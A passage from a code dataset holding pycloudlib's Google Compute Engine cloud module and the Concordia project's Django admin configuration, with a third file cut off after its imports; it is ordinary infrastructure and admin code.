for a particular release.\n\n Args:\n release: string, Ubuntu release to look for\n\n Returns:\n string, path to latest daily image\n\n \"\"\"\n self._log.debug(\n \"finding daily Ubuntu image for arch: %s and release: %s\",\n arch,\n release,\n )\n project = self._get_project(image_type=image_type)\n name_filter = self._get_name_filter(\n release=release, image_type=image_type\n )\n\n image_list = self._query_image_list(\n release, project, name_filter, arch\n )\n\n if not image_list:\n msg = (\n \"Could not find {} image for arch: {} and release: {}\".format(\n image_type.value,\n arch,\n release,\n )\n )\n self._log.warning(msg)\n raise ImageNotFoundError(\n image_type=image_type.value, arch=arch, release=release\n )\n\n image = sorted(image_list, key=lambda x: x[\"creationTimestamp\"])[-1]\n self._log.debug(\n 'Found image name \"%s\" for arch \"%s\"',\n image[\"name\"],\n arch,\n )\n return \"projects/{}/global/images/{}\".format(project, image[\"id\"])\n\n def image_serial(self, image_id):\n \"\"\"Find the image serial of the latest daily image for a particular release.\n\n Args:\n image_id: string, Ubuntu image id\n\n Returns:\n string, serial of latest image\n\n \"\"\"\n raise NotImplementedError\n\n def delete_image(self, image_id, **kwargs):\n \"\"\"Delete an image.\n\n Args:\n image_id: string, id of the image to delete\n \"\"\"\n try:\n api_image_id = (\n self.compute.images()\n .get(project=self.project, image=os.path.basename(image_id))\n .execute()[\"id\"]\n )\n except googleapiclient.errors.HttpError as e:\n if \"was not found\" not in str(e):\n raise\n return\n response = (\n self.compute.images()\n .delete(\n project=self.project,\n image=api_image_id,\n )\n .execute()\n )\n\n raise_on_error(response)\n\n def get_instance(\n self,\n instance_id,\n name=None,\n *,\n username: Optional[str] = None,\n **kwargs,\n ):\n \"\"\"Get an instance by id.\n\n Args:\n instance_id: The instance ID returned upon creation\n username: username to use when connecting via SSH\n\n Returns:\n An instance object to use to manipulate the instance further.\n\n \"\"\"\n return GceInstance(\n self.key_pair,\n instance_id,\n self.project,\n self.zone,\n self.credentials_path,\n name=name,\n username=username,\n )\n\n def launch(\n self,\n image_id,\n instance_type=\"n1-standard-1\",\n user_data=None,\n *,\n username: Optional[str] = None,\n **kwargs,\n ):\n \"\"\"Launch instance on GCE and print the IP address.\n\n Args:\n image_id: string, image ID for instance to use\n instance_type: string, instance type to launch\n user_data: string, user-data to pass to instance\n username: username to use when connecting via SSH\n kwargs: other named arguments to add to instance JSON\n Raises: ValueError on invalid image_id\n \"\"\"\n if not image_id:\n raise ValueError(\n f\"{self._type} launch requires image_id param.\"\n f\" Found: {image_id}\"\n )\n instance_name = \"i{}-{}\".format(next(self.instance_counter), self.tag)\n config: MutableMapping[str, Any] = {\n \"name\": instance_name,\n \"machineType\": \"zones/%s/machineTypes/%s\"\n % (self.zone, instance_type),\n \"disks\": [\n {\n \"boot\": True,\n \"autoDelete\": True,\n \"initializeParams\": {\n \"sourceImage\": image_id,\n },\n }\n ],\n \"networkInterfaces\": [\n {\n \"network\": \"global/networks/default\",\n \"accessConfigs\": [\n {\"type\": \"ONE_TO_ONE_NAT\", \"name\": \"External NAT\"}\n ],\n }\n ],\n \"metadata\": {\n \"items\": [\n {\n \"key\": \"ssh-keys\",\n \"value\": \"ubuntu:%s\"\n % self.key_pair.public_key_content,\n }\n ]\n },\n }\n\n if self.service_account_email:\n config[\"serviceAccounts\"] = [{\"email\": self.service_account_email}]\n\n if user_data:\n user_metadata = {\"key\": \"user-data\", \"value\": user_data}\n config[\"metadata\"][\"items\"].append(user_metadata)\n\n operation = (\n self.compute.instances()\n .insert(project=self.project, zone=self.zone, body=config)\n .execute()\n )\n raise_on_error(operation)\n\n result = (\n self.compute.instances()\n .get(\n project=self.project,\n zone=self.zone,\n instance=instance_name,\n )\n .execute()\n )\n raise_on_error(result)\n\n instance = self.get_instance(\n result[\"id\"], name=result[\"name\"], username=username\n )\n self.created_instances.append(instance)\n return instance\n\n def snapshot(self, instance: GceInstance, clean=True, **kwargs):\n \"\"\"Snapshot an instance and generate an image from it.\n\n Args:\n instance: Instance to snapshot\n clean: run instance clean method before taking snapshot\n\n Returns:\n An image id\n \"\"\"\n response = (\n self.compute.disks()\n .list(project=self.project, zone=self.zone)\n .execute()\n )\n\n instance_disks = [\n disk for disk in response[\"items\"] if disk[\"name\"] == instance.name\n ]\n\n if len(instance_disks) > 1:\n raise PycloudlibError(\n \"Snapshotting an image with multiple disks not supported\"\n )\n\n instance.shutdown()\n\n snapshot_name = \"{}-image\".format(instance.name)\n operation = (\n self.compute.images()\n .insert(\n project=self.project,\n body={\n \"name\": snapshot_name,\n \"sourceDisk\": instance_disks[0][\"selfLink\"],\n },\n )\n .execute()\n )\n raise_on_error(operation)\n self._wait_for_operation(operation)\n\n image_id = \"projects/{}/global/images/{}\".format(\n self.project, snapshot_name\n )\n self.created_images.append(image_id)\n return image_id\n\n def _wait_for_operation(\n self, operation, operation_type=\"global\", sleep_seconds=300\n ):\n response = None\n kwargs = {\"project\": self.project, \"operation\": operation[\"name\"]}\n if operation_type == \"zone\":\n kwargs[\"zone\"] = self.zone\n api = self.compute.zoneOperations()\n else:\n api = self.compute.globalOperations()\n for _ in range(sleep_seconds):\n try:\n response = api.get(**kwargs).execute()\n except ConnectionResetError:\n # This exception is known to be raised by GCE every so often:\n # https://github.com/canonical/pycloudlib/issues/101.\n response = {\n \"status\": \"ConnectionResetError\",\n \"statusMessage\": \"n/a\",\n }\n else:\n if response[\"status\"] == \"DONE\":\n break\n time.sleep(1)\n else:\n raise PycloudlibError(\n \"Expected DONE state, but found {} after waiting {} seconds. \"\n \"Check GCE console for more details. \\n\"\n \"Status message: {}\".format(\n response[\"status\"],\n sleep_seconds,\n response[\"statusMessage\"],\n )\n )\n","repo_name":"canonical/pycloudlib","sub_path":"pycloudlib/gce/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":16835,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"40718399478","text":"import logging\nfrom urllib.parse import urljoin\n\nfrom django.conf import settings\nfrom django.contrib import admin, messages\nfrom django.contrib.admin.models import CHANGE, LogEntry\nfrom django.contrib.admin.options import get_content_type_for_model\nfrom django.contrib.auth import get_permission_codename\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template.defaultfilters import truncatechars\nfrom django.template.response import TemplateResponse\nfrom django.urls import path, reverse\nfrom django.utils.decorators import method_decorator\nfrom django.utils.html import format_html\nfrom django.views.decorators.csrf import csrf_protect\nfrom django_admin_multiple_choice_list_filter.list_filters import (\n MultipleChoiceListFilter,\n)\nfrom tabular_export.admin import export_to_csv_action, export_to_excel_action\nfrom tabular_export.core import export_to_csv_response, flatten_queryset\n\nfrom exporter import views as exporter_views\nfrom importer.tasks import import_items_into_project_from_url\n\nfrom ..models import (\n Asset,\n AssetTranscriptionReservation,\n Banner,\n Campaign,\n CampaignRetirementProgress,\n CarouselSlide,\n Item,\n Project,\n Resource,\n ResourceFile,\n SimpleContentBlock,\n SimplePage,\n SiteReport,\n Tag,\n Topic,\n Transcription,\n UserAssetTagCollection,\n UserProfileActivity,\n)\nfrom ..tasks import retire_campaign\nfrom ..views import ReportCampaignView\nfrom .actions import (\n anonymize_action,\n change_status_to_completed,\n change_status_to_in_progress,\n change_status_to_needs_review,\n publish_action,\n publish_item_action,\n unpublish_action,\n unpublish_item_action,\n)\nfrom .filters import (\n AcceptedFilter,\n AssetCampaignListFilter,\n AssetCampaignStatusListFilter,\n AssetProjectListFilter2,\n ItemCampaignListFilter,\n ItemCampaignStatusListFilter,\n ItemProjectListFilter2,\n OcrGeneratedFilter,\n OcrOriginatedFilter,\n ProjectCampaignListFilter,\n ProjectCampaignStatusListFilter,\n RejectedFilter,\n ResourceCampaignListFilter,\n ResourceCampaignStatusListFilter,\n SiteReportCampaignListFilter,\n SiteReportSortedCampaignListFilter,\n SubmittedFilter,\n TagCampaignListFilter,\n TagCampaignStatusListFilter,\n TranscriptionCampaignListFilter,\n TranscriptionCampaignStatusListFilter,\n TranscriptionProjectListFilter,\n UserAssetTagCollectionCampaignStatusListFilter,\n UserProfileActivityCampaignListFilter,\n UserProfileActivityCampaignStatusListFilter,\n)\nfrom .forms import (\n AdminItemImportForm,\n BleachedDescriptionAdminForm,\n CampaignAdminForm,\n ProjectAdminForm,\n SimpleContentBlockAdminForm,\n)\n\n\nclass ProjectListFilter(MultipleChoiceListFilter):\n title = \"Project\"\n\n def lookups(self, request, model_admin):\n choices = Project.objects.values_list(\"pk\", \"title\")\n return tuple(choices)\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass AssetProjectListFilter(ProjectListFilter):\n parameter_name = \"item__project__in\"\n\n\nclass ItemProjectListFilter(ProjectListFilter):\n parameter_name = \"project__in\"\n\n\nclass ConcordiaUserAdmin(UserAdmin):\n list_display = UserAdmin.list_display + (\"date_joined\", \"transcription_count\")\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n qs = qs.annotate(Count(\"transcription\"))\n return qs\n\n @admin.display(ordering=\"transcription__count\")\n def transcription_count(self, obj):\n return obj.transcription__count\n\n EXPORT_FIELDS = (\n \"username\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"is_active\",\n \"is_staff\",\n \"is_superuser\",\n \"date_joined\",\n \"last_login\",\n \"transcription__count\",\n )\n\n def export_users_as_csv(self, request, queryset):\n return export_to_csv_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n def export_users_as_excel(self, request, queryset):\n return export_to_excel_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n actions = (anonymize_action, export_users_as_csv, export_users_as_excel)\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, ConcordiaUserAdmin)\n\n\n@admin.register(Banner)\nclass BannerAdmin(admin.ModelAdmin):\n list_display = (\n \"text\",\n \"active\",\n )\n\n\nclass CustomListDisplayFieldsMixin:\n \"\"\"\n Mixin which provides some custom text formatters for list display fields\n used on multiple models\n \"\"\"\n\n @admin.display(description=\"Description\")\n def truncated_description(self, obj):\n return truncatechars(obj.description, 200)\n\n @admin.display(description=\"Metadata\")\n def truncated_metadata(self, obj):\n if obj.metadata:\n return format_html(\"{}\", truncatechars(obj.metadata, 200))\n else:\n return \"\"\n\n\n@admin.register(Campaign)\nclass CampaignAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n form = CampaignAdminForm\n\n list_display = (\n \"title\",\n \"status\",\n \"published\",\n \"unlisted\",\n \"display_on_homepage\",\n \"ordering\",\n \"launch_date\",\n \"completed_date\",\n )\n list_editable = (\n \"display_on_homepage\",\n \"ordering\",\n \"published\",\n \"unlisted\",\n \"status\",\n \"launch_date\",\n \"completed_date\",\n )\n list_display_links = (\"title\",)\n prepopulated_fields = {\"slug\": (\"title\",)}\n search_fields = [\"title\", \"description\"]\n list_filter = (\"published\", \"display_on_homepage\", \"unlisted\", \"status\")\n\n actions = (publish_action, unpublish_action)\n\n def get_urls(self):\n urls = super().get_urls()\n\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n\n custom_urls = [\n path(\n \"exportCSV/\",\n exporter_views.ExportCampaignToCSV.as_view(),\n name=f\"{app_label}_{model_name}_export-csv\",\n ),\n path(\n \"exportBagIt/\",\n exporter_views.ExportCampaignToBagIt.as_view(),\n name=f\"{app_label}_{model_name}_export-bagit\",\n ),\n path(\n \"report/\",\n ReportCampaignView.as_view(),\n name=f\"{app_label}_{model_name}_report\",\n ),\n path(\n \"retire/\",\n self.admin_site.admin_view(self.retire),\n name=f\"{app_label}_{model_name}_retire\",\n ),\n ]\n\n return custom_urls + urls\n\n @method_decorator(csrf_protect)\n @method_decorator(permission_required(\"concordia.retire_campaign\"))\n @method_decorator(permission_required(\"concordia.delete_project\"))\n @method_decorator(permission_required(\"concordia.delete_item\"))\n @method_decorator(permission_required(\"concordia.delete_asset\"))\n @method_decorator(permission_required(\"concordia.delete_transcription\"))\n @method_decorator(permission_required(\"concordia.delete_import_item_asset\"))\n def retire(self, request, campaign_slug):\n try:\n campaign = Campaign.objects.filter(slug=campaign_slug)[0]\n except IndexError:\n return self._get_obj_does_not_exist_redirect(\n request, self.opts, campaign_slug\n )\n\n projects = campaign.project_set.values_list(\"id\", flat=True)\n items = Item.objects.filter(project__id__in=projects).values_list(\n \"id\", flat=True\n )\n assets = Asset.objects.filter(item__id__in=items).values_list(\"id\", flat=True)\n transcriptions = Transcription.objects.filter(asset__id__in=assets)\n\n model_count = {\n \"project\": len(projects),\n \"item\": len(items),\n \"asset\": len(assets),\n \"transcription\": transcriptions.count(),\n }\n\n if request.POST:\n # This means the user confirmed the retirement\n obj_display = str(campaign)\n self.log_retirement(request, campaign, obj_display)\n progress = retire_campaign(campaign.id)\n self.message_user(\n request,\n 'The retirement process for %(name)s \"%(obj)s\" has begun.'\n % {\n \"name\": self.opts.verbose_name,\n \"obj\": obj_display,\n },\n messages.SUCCESS,\n )\n post_url = reverse(\n \"admin:concordia_campaignretirementprogress_change\",\n args=[progress.id],\n current_app=self.admin_site.name,\n )\n return HttpResponseRedirect(post_url)\n\n context = {\n **self.admin_site.each_context(request),\n \"title\": \"Are you sure?\",\n \"subtitle\": None,\n \"object_name\": \"Campaign\",\n \"object\": campaign,\n \"model_count\": model_count.items(),\n \"opts\": self.opts,\n \"app_label\": self.opts.app_label,\n \"preserved_filters\": self.get_preserved_filters(request),\n }\n\n return TemplateResponse(\n request, \"admin/concordia/campaign/retire.html\", context\n )\n\n def log_retirement(self, request, obj, object_repr):\n return LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(obj).pk,\n object_id=obj.pk,\n object_repr=object_repr,\n action_flag=CHANGE,\n )\n\n\n@admin.register(Resource)\nclass ResourceAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n list_display = (\"campaign\", \"topic\", \"sequence\", \"title\", \"resource_url\")\n list_display_links = (\"campaign\", \"topic\", \"sequence\", \"title\")\n list_filter = (\n \"resource_type\",\n ResourceCampaignStatusListFilter,\n ResourceCampaignListFilter,\n \"title\",\n )\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"campaign\":\n kwargs[\"queryset\"] = Campaign.objects.order_by(\"title\")\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n\n@admin.register(ResourceFile)\nclass ResourceFileAdmin(admin.ModelAdmin):\n # Bulk delete bypasses file deletion, so we don't want any bulk actions\n actions = None\n list_display = (\"name\", \"resource_url\", \"updated_on\")\n readonly_fields = (\"resource_url\", \"updated_on\")\n\n def resource_url(self, obj):\n # Boto3 adds a querystring parameters to the URL to allow access\n # to private files. In this case, all files are public, and we\n # we don't want the querystring, so we remove it.\n # This looks hacky, but seems to be the least hacky way to do\n # this without a third-party library.\n return obj.resource.url.split(\"?\")[0]\n\n def get_fields(self, request, obj=None):\n # We want don't want to display the resource field except during\n # creation, since uploading a new file will leave behind the original\n # as an orphan.\n if obj:\n return (\n \"name\",\n \"resource_url\",\n \"resource\",\n \"updated_on\",\n )\n return (\"name\", \"resource\")\n\n\n@admin.register(Topic)\nclass TopicAdmin(admin.ModelAdmin):\n form = BleachedDescriptionAdminForm\n\n list_display = (\n \"id\",\n \"title\",\n \"slug\",\n \"short_description\",\n \"published\",\n \"unlisted\",\n \"ordering\",\n )\n\n list_display_links = (\"id\", \"title\", \"slug\")\n prepopulated_fields = {\"slug\": (\"title\",)}\n\n\n@admin.register(Project)\nclass ProjectAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n form = ProjectAdminForm\n\n # todo: add foreignKey link for campaign\n list_display = (\"id\", \"title\", \"slug\", \"campaign\", \"published\", \"ordering\")\n list_editable = (\"ordering\",)\n list_display_links = (\"id\", \"title\", \"slug\")\n prepopulated_fields = {\"slug\": (\"title\",)}\n search_fields = [\"title\", \"campaign__title\"]\n list_filter = (\n \"published\",\n \"topics\",\n ProjectCampaignStatusListFilter,\n ProjectCampaignListFilter,\n )\n\n actions = (publish_action, unpublish_action)\n\n def lookup_allowed(self, key, value):\n if key in (\"campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n def get_urls(self):\n urls = super().get_urls()\n\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n\n custom_urls = [\n path(\n \"/item-import/\",\n self.admin_site.admin_view(self.item_import_view),\n name=f\"{app_label}_{model_name}_item-import\",\n )\n ]\n\n return custom_urls + urls\n\n @method_decorator(permission_required(\"concordia.add_campaign\"))\n @method_decorator(permission_required(\"concordia.change_campaign\"))\n @method_decorator(permission_required(\"concordia.add_project\"))\n @method_decorator(permission_required(\"concordia.change_project\"))\n @method_decorator(permission_required(\"concordia.add_item\"))\n @method_decorator(permission_required(\"concordia.change_item\"))\n def item_import_view(self, request, object_id):\n project = get_object_or_404(Project, pk=object_id)\n\n if request.method == \"POST\":\n form = AdminItemImportForm(request.POST)\n\n if form.is_valid():\n import_url = form.cleaned_data[\"import_url\"]\n\n import_job = import_items_into_project_from_url(\n request.user, project, import_url\n )\n else:\n form = AdminItemImportForm()\n import_job = None\n\n media = self.media\n\n context = {\n **self.admin_site.each_context(request),\n \"app_label\": self.model._meta.app_label,\n \"add\": False,\n \"change\": False,\n \"save_as\": False,\n \"save_on_top\": False,\n \"opts\": self.model._meta,\n \"title\": f\"Import Items into “{project.title}”\",\n \"object_id\": object_id,\n \"original\": project,\n \"media\": media,\n \"preserved_filters\": self.get_preserved_filters(request),\n \"is_popup\": False,\n \"has_view_permission\": True,\n \"has_add_permission\": True,\n \"has_change_permission\": True,\n \"has_delete_permission\": False,\n \"has_editable_inline_admin_formsets\": False,\n \"project\": project,\n \"form\": form,\n \"import_job\": import_job,\n }\n\n return render(request, \"admin/concordia/project/item_import.html\", context)\n\n\n@admin.register(Item)\nclass ItemAdmin(admin.ModelAdmin):\n list_display = (\"title\", \"item_id\", \"campaign_title\", \"project\", \"published\")\n list_display_links = (\"title\", \"item_id\")\n search_fields = [\n \"title\",\n \"item_id\",\n \"item_url\",\n \"project__campaign__title\",\n \"project__title\",\n ]\n\n list_filter = (\n \"published\",\n \"project__topics\",\n ItemCampaignStatusListFilter,\n ItemCampaignListFilter,\n ItemProjectListFilter2,\n )\n\n actions = (publish_item_action, unpublish_item_action)\n\n def lookup_allowed(self, key, value):\n if key in (\"project__campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n def get_deleted_objects(self, objs, request):\n if len(objs) < 30:\n deleted_objects = [str(obj) for obj in objs]\n else:\n deleted_objects = [str(obj) for obj in objs[:3]]\n deleted_objects.append(\n f\"… and {len(objs) - 3} more {Item._meta.verbose_name_plural}\"\n )\n perms_needed = set()\n for model in (Item, Asset, Transcription):\n perm = \"%s.%s\" % (\n model._meta.app_label,\n get_permission_codename(\"delete\", model._meta),\n )\n if not request.user.has_perm(perm):\n perms_needed.add(model._meta.verbose_name)\n protected = []\n\n model_count = {\n Item._meta.verbose_name_plural: len(objs),\n Asset._meta.verbose_name_plural: Asset.objects.filter(\n item__in=objs\n ).count(),\n Transcription._meta.verbose_name_plural: Transcription.objects.filter(\n asset__item__in=objs\n ).count(),\n }\n\n return (deleted_objects, model_count, perms_needed, protected)\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n qs = qs.select_related(\"project\", \"project__campaign\")\n return qs\n\n def campaign_title(self, obj):\n return obj.project.campaign.title\n\n\n@admin.register(AssetTranscriptionReservation)\nclass AssetTranscriptionReservationAdmin(\n admin.ModelAdmin, CustomListDisplayFieldsMixin\n):\n list_display = (\n \"created_on\",\n \"updated_on\",\n \"asset\",\n \"reservation_token\",\n \"tombstoned\",\n )\n list_display_links = (\"reservation_token\", \"created_on\")\n readonly_fields = (\"asset\", \"created_on\", \"updated_on\")\n\n\n@admin.register(Asset)\nclass AssetAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n list_display = (\n \"published\",\n \"transcription_status\",\n \"item_id\",\n \"year\",\n \"sequence\",\n \"difficulty\",\n \"truncated_media_url\",\n \"media_type\",\n \"truncated_metadata\",\n )\n list_display_links = (\"item_id\", \"sequence\")\n prepopulated_fields = {\"slug\": (\"title\",)}\n search_fields = [\n \"title\",\n \"media_url\",\n \"item__project__campaign__title\",\n \"item__project__title\",\n \"item__item_id\",\n ]\n list_filter = (\n \"transcription_status\",\n \"published\",\n \"item__project__topics\",\n AssetCampaignStatusListFilter,\n AssetCampaignListFilter,\n AssetProjectListFilter2,\n \"media_type\",\n )\n actions = (\n publish_action,\n change_status_to_completed,\n change_status_to_in_progress,\n change_status_to_needs_review,\n unpublish_action,\n export_to_csv_action,\n export_to_excel_action,\n )\n autocomplete_fields = (\"item\",)\n ordering = (\"item__item_id\", \"sequence\")\n change_list_template = \"admin/concordia/asset/change_list.html\"\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n return qs.select_related(\"item\").order_by(\"item__item_id\", \"sequence\")\n\n def lookup_allowed(self, key, value):\n if key in (\"item__project__id__exact\", \"item__project__campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n def item_id(self, obj):\n return obj.item.item_id\n\n @admin.display(description=\"Media URL\")\n def truncated_media_url(self, obj):\n return format_html(\n '{}',\n urljoin(settings.MEDIA_URL, obj.media_url),\n truncatechars(obj.media_url, 100),\n )\n\n def get_readonly_fields(self, request, obj=None):\n if obj:\n return self.readonly_fields + (\"item\",)\n return self.readonly_fields\n\n def change_view(self, request, object_id, extra_context=None, **kwargs):\n if object_id:\n if extra_context is None:\n extra_context = {}\n extra_context[\"transcriptions\"] = (\n Transcription.objects.filter(asset__pk=object_id)\n .select_related(\"user\", \"reviewed_by\")\n .order_by(\"-pk\")\n )\n return super().change_view(\n request, object_id, extra_context=extra_context, **kwargs\n )\n\n def has_reopen_permission(self, request):\n opts = self.opts\n codename = get_permission_codename(\"reopen\", opts)\n return request.user.has_perm(f\"{opts.app_label}.{codename}\")\n\n\n@admin.register(Tag)\nclass TagAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"value\")\n list_display_links = (\"id\", \"value\")\n list_filter = (TagCampaignStatusListFilter, TagCampaignListFilter)\n\n search_fields = [\"value\"]\n\n actions = (\"export_tags_as_csv\",)\n\n def lookup_allowed(self, key, value):\n if key in [\"userassettagcollection__asset__item__project__campaign__id__exact\"]:\n return True\n return super().lookup_allowed(key, value)\n\n def export_tags_as_csv(self, request, queryset):\n tags = queryset.prefetch_related(\n \"userassettagcollection\", \"userassettagcollection__asset\"\n ).order_by(\"userassettagcollection__asset_id\")\n\n headers, data = flatten_queryset(\n tags,\n field_names=[\n \"value\",\n \"userassettagcollection__created_on\",\n \"userassettagcollection__user_id\",\n \"userassettagcollection__asset_id\",\n \"userassettagcollection__asset__title\",\n \"userassettagcollection__asset__download_url\",\n \"userassettagcollection__asset__resource_url\",\n \"userassettagcollection__asset__item__project__campaign__slug\",\n ],\n extra_verbose_names={\n \"value\": \"tag value\",\n \"userassettagcollection__created_on\": \"user asset tag collection date created\", # noqa: E501\n \"userassettagcollection__user_id\": \"user asset tag collection user_id\",\n \"userassettagcollection__asset_id\": \"asset id\",\n \"userassettagcollection__asset__title\": \"asset title\",\n \"userassettagcollection__asset__download_url\": \"asset download url\",\n \"userassettagcollection__asset__resource_url\": \"asset resource url\",\n \"userassettagcollection__asset__item__project__campaign__slug\": \"campaign slug\", # noqa: E501\n },\n )\n\n return export_to_csv_response(\"tags.csv\", headers, data)\n\n\n@admin.register(UserAssetTagCollection)\nclass UserAssetTagCollectionAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"asset\", \"user\", \"created_on\", \"updated_on\")\n list_display_links = (\"id\", \"asset\")\n date_hierarchy = \"created_on\"\n search_fields = [\"asset__title\", \"asset__campaign__title\", \"asset__project__title\"]\n list_filter = (\n UserAssetTagCollectionCampaignStatusListFilter,\n \"asset__item__project__campaign\",\n \"asset__item__project\",\n \"user__is_staff\",\n )\n\n\n@admin.register(Transcription)\nclass TranscriptionAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"asset\",\n \"user\",\n \"truncated_text\",\n \"created_on\",\n \"updated_on\",\n \"accepted\",\n \"rejected\",\n )\n list_display_links = (\"id\", \"asset\")\n\n list_filter = (\n SubmittedFilter,\n AcceptedFilter,\n RejectedFilter,\n OcrGeneratedFilter,\n OcrOriginatedFilter,\n TranscriptionCampaignStatusListFilter,\n TranscriptionCampaignListFilter,\n TranscriptionProjectListFilter,\n )\n\n search_fields = [\"text\", \"user__username\", \"user__email\"]\n\n readonly_fields = (\n \"asset\",\n \"user\",\n \"created_on\",\n \"updated_on\",\n \"submitted\",\n \"accepted\",\n \"rejected\",\n \"reviewed_by\",\n \"supersedes\",\n \"text\",\n )\n\n EXPORT_FIELDS = (\n \"id\",\n \"asset__id\",\n \"asset__slug\",\n \"user\",\n \"created_on\",\n \"updated_on\",\n \"supersedes\",\n \"submitted\",\n \"accepted\",\n \"rejected\",\n \"reviewed_by\",\n \"text\",\n \"ocr_generated\",\n \"ocr_originated\",\n )\n\n def lookup_allowed(self, key, value):\n if key in (\"asset__item__project__campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n @admin.display(description=\"Text\")\n def truncated_text(self, obj):\n return truncatechars(obj.text, 100)\n\n def export_to_csv(self, request, queryset):\n return export_to_csv_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n def export_to_excel(self, request, queryset):\n return export_to_excel_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n actions = (export_to_csv, export_to_excel)\n\n\n@admin.register(SimpleContentBlock)\nclass SimpleContentBlockAdmin(admin.ModelAdmin):\n form = SimpleContentBlockAdminForm\n\n list_display = (\"slug\", \"created_on\", \"updated_on\")\n readonly_fields = (\"created_on\", \"updated_on\")\n\n fieldsets = (\n (None, {\"fields\": (\"created_on\", \"updated_on\", \"slug\")}),\n (\"Body\", {\"classes\": (\"markdown-preview\",), \"fields\": (\"body\",)}),\n )\n\n\n@admin.register(CarouselSlide)\nclass CarouselSlideAdmin(admin.ModelAdmin):\n list_display = (\"headline\", \"published\", \"ordering\")\n readonly_fields = (\"created_on\", \"updated_on\")\n\n\n@admin.register(SimplePage)\nclass SimplePageAdmin(admin.ModelAdmin):\n list_display = (\"path\", \"title\", \"created_on\", \"updated_on\")\n readonly_fields = (\"created_on\", \"updated_on\")\n\n fieldsets = (\n (None, {\"fields\": (\"created_on\", \"updated_on\", \"path\", \"title\")}),\n (\"Body\", {\"classes\": (\"markdown-preview\",), \"fields\": (\"body\",)}),\n )\n\n\n@admin.register(SiteReport)\nclass SiteReportAdmin(admin.ModelAdmin):\n list_display = (\"created_on\", \"report_name\", \"campaign\", \"topic\")\n\n list_filter = (\n \"report_name\",\n SiteReportSortedCampaignListFilter,\n SiteReportCampaignListFilter,\n \"topic\",\n )\n\n def export_to_csv(self, request, queryset):\n return export_to_csv_action(\n self, request, queryset, field_names=SiteReport.DEFAULT_EXPORT_FIELDNAMES\n )\n\n def export_to_excel(self, request, queryset):\n return export_to_excel_action(\n self, request, queryset, field_names=SiteReport.DEFAULT_EXPORT_FIELDNAMES\n )\n\n actions = (export_to_csv, export_to_excel)\n\n FIELDNAME_SORT_KEYS = [\n \"created\",\n \"user\",\n \"campaign\",\n \"topic\",\n \"project\",\n \"item\",\n \"asset\",\n \"transcription\",\n \"tag\",\n ]\n\n def fieldname_sort_key(self, key):\n for i, prefix in enumerate(self.FIELDNAME_SORT_KEYS):\n if prefix in key:\n return (i, key)\n else:\n return (1024, key)\n\n\n@admin.register(UserProfileActivity)\nclass UserProfileActivityAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"user\",\n \"campaign\",\n \"get_status\",\n \"transcribe_count\",\n \"review_count\",\n )\n list_filter = (\n UserProfileActivityCampaignStatusListFilter,\n UserProfileActivityCampaignListFilter,\n )\n raw_id_fields = [\"user\", \"campaign\"]\n read_only_fields = (\n \"user\",\n \"campaign\",\n \"asset_count\",\n \"asset_tag_count\",\n \"transcribe_count\",\n \"review_count\",\n )\n search_fields = [\n \"user__username\",\n ]\n\n\n@admin.register(CampaignRetirementProgress)\nclass CampaignRetirementProgressAdmin(admin.ModelAdmin):\n list_display = (\"campaign\", \"started_on\", \"complete\", \"completed_on\")\n readonly_fields = (\n \"campaign\",\n \"completion\",\n \"projects_removed\",\n \"project_total\",\n \"items_removed\",\n \"item_total\",\n \"assets_removed\",\n \"asset_total\",\n \"complete\",\n \"started_on\",\n \"completed_on\",\n \"removal_log\",\n )\n fieldsets = (\n (\n None,\n {\n \"fields\": (\n \"campaign\",\n \"completion\",\n \"projects_removed\",\n \"project_total\",\n \"items_removed\",\n \"item_total\",\n \"assets_removed\",\n \"asset_total\",\n \"complete\",\n \"started_on\",\n \"completed_on\",\n ),\n },\n ),\n (\n \"Log\",\n {\n \"fields\": (\"removal_log\",),\n \"classes\": (\"collapse\",),\n },\n ),\n )\n\n @admin.display(description=\"Completion percentage\")\n def completion(self, obj):\n if obj.complete:\n return \"100%\"\n total = obj.project_total + obj.item_total + obj.asset_total\n removed = obj.projects_removed + obj.items_removed + obj.assets_removed\n return \"{}%\".format(round(removed / total * 100, 2))\n","repo_name":"LibraryOfCongress/concordia","sub_path":"concordia/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":29137,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"52"} +{"seq_id":"23223067187","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django.contrib.postgres import fields as pgfields\n\nfrom jsoneditor.forms import JSONEditor\n\nfrom training.utils.admin import 